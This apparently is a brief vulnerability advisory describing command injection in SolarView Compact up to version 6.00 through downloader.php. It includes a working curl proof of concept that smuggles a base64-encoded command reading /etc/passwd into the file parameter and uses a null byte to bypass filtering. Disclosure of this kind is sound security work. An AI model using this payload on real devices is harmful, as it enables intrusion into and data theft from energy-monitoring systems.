There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
- SolarView Compact
- SolarView Compact
- SolarView Compact <=ver 6.00
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
Commands can be injected by bypassing internal restrictions by accessing the file parameter of the downloader.php page.